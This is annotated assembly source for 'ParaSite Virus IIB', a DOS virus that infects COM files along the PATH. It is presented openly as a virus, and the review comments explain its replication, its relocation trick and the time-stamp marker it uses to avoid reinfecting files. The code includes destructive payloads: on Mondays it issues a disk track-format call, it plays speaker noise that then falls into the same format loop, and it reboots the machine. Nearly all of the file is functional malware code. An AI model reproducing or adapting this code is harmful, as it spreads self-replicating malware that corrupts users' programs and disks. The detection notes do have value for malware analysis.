
  1. ;********************************************************************    
  2. ;   <PARSIT2B.ASM>   -   ParaSite Virus IIB                              
  3. ;                        By: Rock Steady                                 
  4. ;  I created this Virus close to one year ago. As you can see it is quite
  5. ;  old... Maybe too Old... But here it is... It Sucks... but its great   
  6. ;  for any virus beginner... Anyhow...                                   
  7. ;  NOTES: Simple COM infector. 10% of the time it reboots the system     
  8. ;         20% it plays machine gun noises on the PC speaker... and
  9. ;         70% of the time it infects another COM file... Have fun...
  10. ;********************************************************************    
  11. MOV_CX  MACRO X
        ; Hand-assembled "MOV CX,imm16": 0B9h is the opcode byte and the DW
        ; supplies the 16-bit immediate X.  NOTE(review): presumably written
        ; this way so the forward-referenced size constant (virlen, used in
        ; CONT) always assembles as a 16-bit immediate; confirm with the
        ; assembler actually used.
  12.         DB    0B9H
  13.         DW    X
  14. ENDM
  15.                                                                          
  16. CODE    SEGMENT
  17.         ASSUME DS:CODE,SS:CODE,CS:CODE,ES:CODE
        ; Single-segment .COM image: CS=DS=ES=SS and the code starts at 100h.
  18.         ORG     100H
  19.
  20.
        ; First-generation entry stub.  In a victim the first three bytes are
        ; replaced by the E9 jump built at jmpop_/jmpdsp_ (see infect) and the
        ; original three bytes are kept in first3_ and put back at virus:.
  21. VCODE:  JMP     virus
  22.
  23.         NOP
  24.         NOP                             ; To identify it as an Infected
  25.         NOP                             ; Program!
        ; NOTE(review): v_start is defined below these NOPs and the bytes
        ; written into victims run from v_start (virlen = lst_byt - v_start),
        ; so the three NOPs exist only in this first-generation file.  The
        ; marker the code actually checks on victims is the file time stamp
        ; (seconds field forced to 1Eh in fix_time_stamp, tested in found_file).
  26.
        ; Start of the bytes appended to victims; the size equates at the end of
        ; the file (virlen, codelen, c_len_x, c_len_y) are relative to this.
  27. v_start equ     $
  28.                                                                          
  29.                                                                          
  30. virus:  PUSH    CX
        ; Register roles for the rest of the file: SI (later also BX) holds the
        ; address of the data area vir_dat; every field is reached as [SI+name]
        ; through the byte-offset equates defined after the data.
        ; The 16-bit immediate of the next instruction (at v_start+2, which is
        ; vir_dat - c_len_x) is patched per victim in CONT so that vir_dat is
        ; right for the address the body is appended at: that patch is the
        ; whole relocation scheme.
  31.         MOV     DX,OFFSET vir_dat
  32.         CLD
  33.         MOV     SI,DX
  34.         ADD     SI,first_3              ; SI -> saved original 3 host bytes
  35.         JMP     Rock_1
  36. Rock_2:
        ; Point the DTA at the code's own dta_ buffer (AH=1Ah, DS:DX).
  37.         MOV     DX,dta
  38.         ADD     DX,SI
  39.         MOV     AH,1AH
  40.         INT     21H
  41.         PUSH    ES                      ; both popped again in find_path
  42.         PUSH    SI
        ; PSP:2Ch holds the environment segment; ES:DI = env:0 is what
        ; find_path scans for "PATH=".
  43.         MOV     ES,DS:2CH
  44.         MOV     DI,0
  45.         JMP     Day_Of_Week
  46. Rock_1:
        ; Repair the host in memory: copy the saved 3 bytes back to 100h so the
        ; host can be resumed from quit.
  47.         MOV     CX,3
  48.         MOV     DI,OFFSET 100H
  49.         REPZ    MOVSB
  50.         MOV     SI,DX                   ; SI = vir_dat
        ; Save the caller's DTA (AH=2Fh returns it in ES:BX) for all_done.
  51.         PUSH    ES
  52.         MOV     AH,2FH
  53.         INT     21H
  54.         MOV     [SI+old_dta],BX
  55.         MOV     [SI+old_dts],ES
  56.         POP     ES
  57.         JMP     Rock_2
  58.                                                                          
  59. Day_Of_Week:
        ; Trigger check.  AH=2Ah returns AL = day of week (0 = Sunday), CX =
        ; year, DH = month, DL = day of month.  Both compares test AL, so the
        ; trigger is the weekday, not "the 1st" as the comment below says:
        ; AL = 1 (Monday) reaches Bad_Mondays; any other day goes to Get_Time.
        ; The comments on the last two lines are swapped relative to the code:
        ; JA goes to the time dispatcher, the JMP goes to the destructive
        ; payload.
  60.         MOV     AH,2AH                  ;Get System date!
  61.         INT     21H
  62.         CMP     AL,1                    ;Check to See if it's Monday!
  63.         JGE     day_check               ;Jump if later than Mondays
  64.         JMP     Get_Time
  65. day_check:
  66.         CMP     AL,1                    ;Check to see if it is the 1st
  67.         JA      Get_Time                ;If yes, create a MESS...
  68.         JMP     Bad_Mondays             ;If not, then go on with infecti
  69. mess:
  70.
        ; Destructive payload: BIOS INT 13h AH=05h (format track) with DL =
        ; drive (2), DH = head (80h), CH = track (0); ES:BX is not set up here
        ; (ES is still the environment segment from Rock_2).  What this does on
        ; real hardware depends on the BIOS.  Reached on Mondays from
        ; Day_Of_Week and, through "JMP mess" below, from the sound payload too;
        ; neither path ever leaves this loop.
  71. Bad_Mondays:
  72.           MOV   DL,2                    ;The Formatting Tracks..
  73.           MOV   AH,05
  74.           MOV   DH,80h
  75.           MOV   CH,0
  76.           INT   13h
  77.
        ; Sound payload: 20 bursts from SHOOT, each followed by a 4000h-count
        ; idle loop.  Entered directly from Get_Time when (seconds AND 0Fh) < 3.
  78. Play_music:
  79.           MOV   CX,20d                  ;Set number of Shots
  80. new_shot:
  81.           PUSH  CX                      ;Save Count
  82.           CALL  Shoot
  83.           MOV   CX,4000H
  84. Silent:   LOOP  silent
  85.           POP   CX
  86.           LOOP  new_Shot
        ; mess: is the empty label just above Bad_Mondays, so this jumps back
        ; into the INT 13h call: the sound path ends in the format loop as well.
  87.           JMP   mess
  88.                                                                          
  89. SHOOT     proc  near                    ;The Machine Gun Noices...
        ; One "shot": toggles bit 1 of port 61h (PC speaker data) 20h times
        ; with a pseudo-random delay between toggles.  DX is the delay state:
        ; each step adds 9248h, rotates right by 3, masks to 9 bits and ORs in
        ; 10 so the LOOP count is never 0.  Clobbers AX, BX, CX, DX and flags;
        ; leaves bits 0-1 of port 61h cleared on return.
  90.           MOV   DX,140h
  91.           MOV   BX,20h                  ; number of toggles
  92.           IN    AL,61h
  93.           AND   AL,11111100b            ; clear the two speaker control bits
  94. SOUND:    XOR   AL,2
  95.           OUT   61h,al
  96.           ADD   dx,9248h
  97.           MOV   CL,3
  98.           ROR   DX,CL
  99.           MOV   CX,DX
  100.           AND   cx,1ffh
  101.           OR    CX,10
  102. WAITA:    LOOP  WAITA
  103.           DEC   BX
  104.           JNZ   SOUND
  105.           AND   AL,11111100b
  106.           OUT   61h,AL
  107.           RET
  108. Shoot     Endp
  109.                                                                          
  110. Get_Time:
        ; Time-based dispatcher.  AH=2Ch returns CH = hour, CL = minute,
        ; DH = seconds, DL = hundredths.  Only the low 4 bits of the seconds
        ; are kept: 0-2 -> Play_music (sound, then the format loop),
        ; 3 -> INT 19h (bootstrap loader, i.e. a reboot), 4-15 -> Find_Path
        ; (infection).  That is about 3/16, 1/16 and 12/16, roughly the
        ; 20/10/70 split quoted in the header.
  111.           MOV   AH,2Ch                  ; Get System Time!
  112.           INT   21h                     ;
  113.           AND   DH,0fh
  114.           CMP   DH,3
  115.           JB    Play_music
  116.           CMP   DH,3h
  117.           JA    Find_Path
  118.           INT   19h
  119.                                                                          
  120. go:
        ; Root-directory infection path.  The only way here is joe1 <- JOE2 <-
        ; the "JB joe2" in quit, which follows CMP BX,0 and therefore never
        ; branches: as assembled this block is unreachable.
        ; AH=47h: get the current directory of drive DL (0 = default) into
        ; DS:SI; AH=3Bh: change directory to root_dir ("\").
  121.         MOV     AH, 47H
  122.         XOR     DL,DL
  123.         ADD     SI, OFFSET orig_path - OFFSET buffer - 8
  124.         INT     21H
  125.         JC      find_path
  126.
  127.         MOV     AH,3BH
  128.         MOV     DX,SI
  129.         ADD     DX, OFFSET root_dir - OFFSET orig_path
  130.         INT     21H
  131.
  132. infect_root:
        ; Copies the first 6 bytes of fipec_ ("COMMAND.COM",0 is 12 bytes)
        ; into the workspace at DI and joins the search at hello.
        ; NOTE(review): BX is used as the data base here, but on the quit path
        ; BX holds OFFSET count rather than vir_dat.
  133.         MOV     [BX+nam_ptr],DI
  134.         MOV     SI,BX
  135.         ADD     SI,f_ipec
  136.         MOV     CX,6
  137.         REPZ    MOVSB
  138.         JMP     hello
  139.                                                                          
  140. find_path:
        ; Locate "PATH=" in the environment block (ES = environment segment,
        ; DI from Rock_2).  The saved SI (vir_dat) is peeked from the stack and
        ; SI+env_str is the 5-byte pattern.  The first byte 'P' is found with
        ; REPNZ SCASB (up to 8000h bytes), then the next 4 bytes are compared
        ; one at a time.
  141.         POP     SI                      ; Seek and Destroy...
  142.         PUSH    SI
  143.         ADD     SI,env_str
  144.         LODSB
  145.         MOV     CX,OFFSET 8000H
  146.         REPNZ   SCASB
  147.         MOV     CX,4
  148.
  149. check_next_4:
  150.         LODSB
  151.         SCASB
  152. ;
  153. ; The JNZ line specifies that if there is no PATH present, then we will
  154. ; along and infect the ROOT directory on the default drive.
        ; NOTE(review): the comment above does not match the code.  A mismatch
        ; jumps back to find_path, which re-reads the saved SI and keeps
        ; scanning from the current DI; nothing on this path goes to the root
        ; directory, and the only bound on the scan is the 8000h-byte SCASB.
  155.
  156.         JNZ     find_path               ;If not path, then go to ROOT di
  157.         LOOP    check_next_4            ;Go back and check for more char
        ; Match: DI points just past "PATH=".  Restore SI and ES (pushed in
        ; Rock_2), keep the PATH cursor in path_ad for set_subdir, and point
        ; DI/SI at the workspace.  From here on BX is the data base.
  158.         POP     SI                      ;Load in PATH again to look for
  159.         POP     ES
  160.         MOV     [SI+path_ad],DI
  161.         MOV     DI,SI
  162.         ADD     DI,wrk_spc
  163.         MOV     BX,SI
  164.         ADD     SI,wrk_spc              ;the File Handle
  165.         MOV     DI,SI
        ; First search: slash_ok writes "*.COM" at the start of the workspace,
        ; i.e. the current directory is searched before any PATH element.
  166.         JMP     SHORT   slash_ok
  167.                                                                          
  168. set_subdir:
        ; A directory is exhausted.  path_ad = 0 (set in moved_last_one) means
        ; the PATH has been consumed -> finish; otherwise take the next PATH
        ; element.  SI must be the data base here.
  169.         CMP     WORD PTR [SI+path_ad],0
  170.         JNZ     found_subdir
  171.         JMP     all_done
  172.                                                                          
  173.                                                                          
  174. found_subdir:
        ; Copy the next PATH element from the environment (DS = environment
        ; segment, SI = path_ad cursor) to the workspace at ES:DI.  DS and the
        ; data base are saved on the stack and come back as DS and BX in
        ; moved_one.
  175.         PUSH    DS
  176.         PUSH    SI
  177.         MOV     DS,ES:2CH
  178.         MOV     DI,SI
  179.         MOV     SI,ES:[DI+path_ad]
  180.         ADD     DI,wrk_spc              ;DI is the handle to infect!
  181.
  182.
  183. move_subdir:
        ; Byte loop: stop at ';' (next element follows) or at 0 (end of PATH).
  184.         LODSB                           ;To tedious work to move into su
  185.         NOP
  186.         CMP     AL,';'                  ;Does it end with a ; character?
  187.         JZ      moved_one               ;if yes, then we found a subdir
  188.         CMP     AL,0                    ;is it the end of the path?
  189.         JZ      moved_last_one          ;if yes, then we save the PATH
  190.         STOSB                           ;marker into DI for future refer
  191.         JMP     SHORT   move_subdir
  192.
  193. moved_last_one:
        ; path_ad = 0 tells set_subdir that the PATH is used up.
  194.         MOV     SI,0
  195.
  196. moved_one:
  197.         POP     BX                      ;BX is where the virus data is
  198.         POP     DS                      ;Restore DS
  199.         NOP
  200.         MOV     [BX+path_ad],SI         ;Where is the next subdir?
        ; NOTE(review): this compares CH, which nothing in this block sets;
        ; the last character copied is in AL.
  201.         CMP     CH,'\'                  ;Check to see if it ends in \
  202.         JZ      slash_ok                ;If yes, then it's OK
  203.         MOV     AL,'\'                  ;if not, then add one...
  204.         STOSB                           ;store the sucker
  205.                                                                          
  206.                                                                          
  207.                                                                          
  208. slash_ok:
        ; Append the search spec "*.COM",0 (6 bytes from fspec_) at DI and
        ; remember in nam_ptr where the found file name will be written.
  209.         MOV     [BX+nam_ptr],DI         ;Move the filename into workspac
  210.         MOV     SI,BX                   ;Restore the original SI value
  211.         ADD     SI,f_spec               ;Point to COM file victim
  212.         MOV     CX,6
  213.         REPZ    MOVSB                   ;Move victim into workspace
  214. hello:
        ; DOS Find First (AH=4Eh): DS:DX = ASCIIZ spec in the workspace,
        ; CX = attribute mask 3, so read-only and hidden files are matched too.
        ; Results land in the DTA set in Rock_2 (the dta_ buffer).
  215.         MOV     SI,BX
  216.         MOV     AH,4EH
  217.         MOV     DX,wrk_spc
  218.         ADD     DX,SI                   ;DX is ... The File to infect
  219.         MOV     CX,3                    ;Attributes of Read Only or Hidd
  220.         INT     21H
  221.         JMP     SHORT   find_first
  222. joe1:
        ; Trampoline for the quit -> JOE2 -> go path, which is never taken.
  223.         JMP     go
  224.                                                                          
  225. find_next:
        ; DOS Find Next (AH=4Fh) continues the search using the current DTA.
  226.         MOV     AH,4FH
  227.         INT     21H
  228.
  229. find_first:
        ; CF clear: a matching entry is in the DTA.  CF set: nothing left in
        ; this directory, move on to the next PATH element.
  230.         JNB     found_file              ;Jump if we found it
  231.         JMP     SHORT   set_subdir      ;Otherwise, get another subdirec
  232.                                                                          
  233. found_file:
        ; Candidate filter on the DTA entry (dta_tim, dta_len and dta_nam are
        ; the time, size and name fields of the DTA, see the data area):
        ;  - the low 5 bits of the time word hold seconds/2; masked with 1Eh
        ;    and equal to 1Eh means the "60 seconds" stamp fix_time_stamp
        ;    writes, i.e. already infected -> skip.  Detection note: that
        ;    60-second time stamp is the file-level indicator this code leaves.
        ;  - low word of the size > 0FA00h (64000) or < 0Ah -> skip.
  234.         MOV     AX,[SI+dta_tim]         ;Get time from DTA
  235.         AND     AL,1EH                  ;Mask to remove all but seconds
  236.         CMP     AL,1EH                  ;60 seconds
  237.         JZ      find_next
  238.         CMP     WORD PTR [SI+dta_len],OFFSET 0FA00H ;Is the file too LON
  239.         JA      find_next               ;If too long, find another one
  240.         CMP     WORD PTR [SI+dta_len],0AH ;Is it too short?
  241.         JB      find_next               ;Then go find another one
        ; Copy the ASCIIZ name from the DTA to nam_ptr so the workspace holds
        ; a full "<dir>\<name>" spec starting at wrk_spc.
  242.         MOV     DI,[SI+nam_ptr]
  243.         PUSH    SI
  244.         ADD     SI,dta_nam
  245.
  246. more_chars:
  247.         LODSB
  248.         STOSB
  249.         CMP     AL,0
  250.         JNZ     more_chars
  251.         POP     SI
        ; AX=4300h: read attributes into CX, saved in old_att.  AX=4301h: write
        ; them back with the read-only bit (bit 0) cleared.  AX=3D02h: open for
        ; read/write; on failure go to fix_attr to restore the attributes.
  252.         MOV     AX,OFFSET 4300H
  253.         MOV     DX,wrk_spc
  254.         ADD     DX,SI
  255.         INT     21H
  256.         MOV     [SI+old_att],CX
  257.         MOV     AX,OFFSET 4301H
  258.         AND     CX,OFFSET 0FFFEH
  259.         MOV     DX,wrk_spc
  260.         ADD     DX,SI
  261.         INT     21H
  262.         MOV     AX,OFFSET 3D02H
  263.         MOV     DX,wrk_spc
  264.         ADD     DX,SI
  265.         INT     21H
  266.         JNB     opened_ok
  267.         JMP     fix_attr
  268.                                                                          
  269. opened_ok:
        ; BX = file handle.  AX=5700h reads the file's time (CX) and date (DX)
        ; so fix_time_stamp can restore them (with the marker seconds).
  270.         MOV     BX,AX
  271.         MOV     AX,OFFSET 5700H
  272.         INT     21H
  273.         MOV     [SI+old_tim],CX         ;Save file time
  274.         MOV     [SI+ol_date],DX         ;Save the date
        ; AH=2Ch / AND DH,7: the masked seconds value is not used afterwards.
  275.         MOV     AH,2CH
  276.         INT     21H
  277.         AND     DH,7
  278.         JMP     infect
  279.                                                                          
  280.                                                                          
  281. infect:
        ; Append the body to the opened host (handle BX, data base SI):
        ;  1. AH=3Fh: read the host's first 3 bytes into first3_ (they are put
        ;     back at virus: when the infected program runs).
        ;  2. AX=4202h: seek to end, AX = host length.  jmp_dsp = length - 3
        ;     is the displacement of the E9 jump from offset 103h to
        ;     100h + length, where the appended body will start.
        ;  3. CX = length + c_len_y is stored at [vir_dat - c_len_x], which is
        ;     v_start+2: the immediate of "MOV DX,OFFSET vir_dat" at the
        ;     entry.  This relocates the data base for the victim's layout.
        ;  4. AH=40h: write virlen bytes starting at v_start (SI - codelen).
        ;  5. AX=4200h: seek to start; write the 3-byte jump (jmpop_/jmpdsp_).
        ; A DOS error or short transfer at any step goes to fix_time_stamp,
        ; which still restores the time stamp and closes the handle.
  282.         MOV     AH,3FH
  283.         MOV     CX,3
  284.         MOV     DX,first_3
  285.         ADD     DX,SI
  286.         INT     21H             ;Save first 3 bytes into the data area
  287.         JB      fix_time_stamp
  288.         CMP     AX,3
  289.         JNZ     fix_time_stamp
  290.         MOV     AX,OFFSET 4202H
  291.         MOV     CX,0
  292.         MOV     DX,0
  293.         INT     21H
  294.         JB      fix_time_stamp
  295.         MOV     CX,AX
  296.         SUB     AX,3
  297.         MOV     [SI+jmp_dsp],AX
  298.         ADD     CX,OFFSET c_len_y
  299.         MOV     DI,SI
  300.         SUB     DI,OFFSET c_len_x
  301.         JMP     CONT
  302. JOE2:
        ; Trampoline for the quit -> joe1 -> go path, which is never taken.
  303.         JMP     JOE1
  304. CONT:
  305.         MOV     [DI],CX
  306.         MOV     AH,40H
  307.         MOV_CX  virlen
  308.         MOV     DX,SI
  309.         SUB     DX,OFFSET codelen
  310.         INT     21H
  311.         JB      fix_time_stamp
  312.         CMP     AX,OFFSET virlen
  313.         JNZ     fix_time_stamp
  314.         MOV     AX,OFFSET 4200H
  315.         MOV     CX,0
  316.         MOV     DX,0
  317.         INT     21H
  318.         JB      fix_time_stamp
  319.         MOV     AH,40H
  320.         MOV     CX,3
  321.         MOV     DX,SI
  322.         ADD     DX,jmp_op
  323.         INT     21H
  324.                                                                          
  325. fix_time_stamp:
        ; Restore the host's date and time (AX=5701h) with the seconds/2 field
        ; forced to 1Eh - the "60 seconds" marker found_file tests - then
        ; close the handle (AH=3Eh).
  326.         MOV     DX,[SI+ol_date]
  327.         MOV     CX,[SI+old_tim]
  328.         AND     CX,OFFSET 0FFE0H
  329.         OR      CX,1EH
  330.         MOV     AX,OFFSET 5701H
  331.         INT     21H
  332.         MOV     AH,3EH
  333.         INT     21H
  334.                                                                          
  335. fix_attr:
        ; Put the original attributes back (AX=4301h, CX = old_att saved in
        ; found_file).  Falls through to all_done.
  336.         MOV     AX,OFFSET 4301H
  337.         MOV     CX,[SI+old_att]
  338.         MOV     DX,wrk_spc
  339.         ADD     DX,SI
  340.         INT     21H
  341.                                                                          
  342. all_done:
        ; Restore the caller's DTA saved in Rock_1 (AH=1Ah, DS:DX).  DS is
        ; switched to old_dts for the call and restored afterwards.
  343.         PUSH    DS
  344.         MOV     AH,1AH
  345.         MOV     DX,[SI+old_dta]
  346.         MOV     DS,[SI+old_dts]
  347.         INT     21H
  348.         POP     DS
  349.                                                                          
  350. quit:
        ; Hand control to the host.  CMP BX,0 never sets CF, so "JB joe2" is
        ; never taken and the joe2/joe1/go path is dead.  The CX pushed at
        ; virus: is popped, the registers are zeroed, 100h is pushed and
        ; RET 0FFFFh pops it into IP (the host's original bytes were restored
        ; there in Rock_1); the immediate is added to SP after the pop, so SP
        ; ends up one lower than it was at entry.
  351.         MOV     BX,OFFSET count
  352.         CMP     BX,0
  353.         JB      joe2
  354.         POP     CX
  355.         XOR     AX,AX                   ;XOR values so that we will give
  356.         XOR     BX,BX                   ;poor sucker a hard time trying
  357.         XOR     DX,DX                   ;reassemble the source code if h
  358.         XOR     SI,SI                   ;decides to dissassemble us.
  359.         MOV     DI,OFFSET 0100H
  360.         PUSH    DI
  361.         XOR     DI,DI
  362.         RET     0FFFFH                  ;Return back to the beginning
  363.                                         ;of the program
  364.                                                                          
  365. vir_dat EQU     $
        ; Data area, appended to victims together with the code.  Every field
        ; is addressed as [SI+name] or [BX+name] through the equates at the
        ; end, which are byte offsets from vir_dat.
  366.
        ; Plain-text string carried in every infected file (a static signature).
  367. Aurther DB      "ParaSite IIB - By: Rock Steady"
  368. olddta_ DW      0                       ; caller's DTA offset (Rock_1)
  369. olddts_ DW      0                       ; caller's DTA segment (Rock_1)
  370. oldtim_ DW      0                       ; victim's file time (opened_ok)
  371. count_  DW      0                       ; only its OFFSET is loaded, in quit
  372. oldate_ DW      0                       ; victim's file date (opened_ok)
  373. oldatt_ DW      0                       ; victim's attributes (found_file)
        ; Host's original first 3 bytes; for this first generation an INT 20h
        ; (terminate) plus NOP, so the program simply exits after the payload
        ; or infection.
  374. first3_ EQU     $
  375.         INT     20H
  376.         NOP
        ; E9 + jmpdsp_: the 3-byte jump written over the victim's first bytes.
  377. jmpop_  DB      0E9H
  378. jmpdsp_ DW      0
  379. fspec_  DB      '*.COM',0               ; search spec used by slash_ok
  380. fipec_  DB      'COMMAND.COM',0         ; used only by the dead infect_root path
  381. pathad_ DW      0                       ; cursor into the environment PATH
  382. namptr_ DW      0                       ; where the found file name is copied
  383. envstr_ DB      'PATH='                 ; pattern scanned for in find_path
        ; 64-byte path/file-name workspace: "<PATH element>\*.COM", then the
        ; found name in place of "*.COM".
  384. wrkspc_ DB      40h dup (0)
        ; DTA set in Rock_2; the next three fields overlay its time (+16h),
        ; size (+1Ah) and name (+1Eh) fields, which found_file reads.
  385. dta_    DB      16h dup (0)
  386. dtatim_ DW      0,0
  387. dtalen_ DW      0,0
  388. dtanam_ DB      0Dh dup (0)
        ; buffer, orig_path and root_dir are referenced only from the dead
        ; "go" path.
  389. buffer  DB      0CDh, 20h, 0, 0, 0, 0, 0, 0
  390. orig_path DB    64 dup (?)
  391. root_dir DB     '\',0
  392. lst_byt EQU     $
        ; Size equates.  virlen: bytes appended to a victim.  codelen: code
        ; bytes before the data area.  c_len_x/c_len_y: used in infect/CONT to
        ; patch the data-base immediate at v_start+2.
  393. virlen  =       lst_byt - v_start
  394. codelen =       vir_dat - v_start
  395. c_len_x =       vir_dat - v_start - 2
  396. c_len_y =       vir_dat - v_start + 100H
        ; Field offsets relative to vir_dat.
  397. old_dta =       olddta_ - vir_dat
  398. old_dts =       olddts_ - vir_dat
  399. old_tim =       oldtim_ - vir_dat
  400. ol_date =       oldate_ - vir_dat
  401. old_att =       oldatt_ - vir_dat
  402. first_3 =       first3_ - vir_dat
  403. jmp_op  =       jmpop_  - vir_dat
  404. jmp_dsp =       jmpdsp_ - vir_dat
  405. f_spec  =       fspec_  - vir_dat
  406. f_ipec  =       fipec_  - vir_dat
  407. path_ad =       pathad_ - vir_dat
  408. nam_ptr =       namptr_ - vir_dat
  409. env_str =       envstr_ - vir_dat
  410. wrk_spc =       wrkspc_ - vir_dat
  411. dta     =       dta_    - vir_dat
  412. dta_tim =       dtatim_ - vir_dat
  413. dta_len =       dtalen_ - vir_dat
  414. dta_nam =       dtanam_ - vir_dat
  415. count   =       count_  - vir_dat
  416.          CODE    ENDS
  417. END     VCODE
  418.  
  419.  
  421.